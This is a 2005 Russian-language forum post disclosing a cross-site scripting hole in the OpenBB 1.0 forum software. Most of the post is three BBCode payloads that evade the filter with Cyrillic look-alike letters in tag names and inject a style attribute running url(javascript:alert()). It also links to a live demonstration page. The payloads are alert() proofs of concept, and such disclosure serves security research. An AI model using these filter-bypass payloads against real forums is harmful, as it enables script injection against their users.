23.05.2005, 17:24
|
|
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
С нами:
11042306
Репутация:
2726
|
|
XSS в OpenBB
OpenBB 1.0 (уязвимы возможно и другие версии)
Травиально.
как всегда через руские буквы
Код:
[еmаil=]aaa[/emаil]`style=background:url(javascript:alert());
[cоlor=a]a[/colоr]`style=background:url(javascript:alert());
[sizе=[cоlor=a=`]a[/cоlor]]a[/sizе]`style=background:url(javascript:alert());
Есть ещё XSS, в основном с использованием других тегов,
найти их очень просто, я их не пишу.
Пример работы уязвимости:
http://s-channel.hut.ru/forum/read.php?TID=6&page=1#87
Последний раз редактировалось KEZ; 23.05.2005 в 17:41..
|
|
|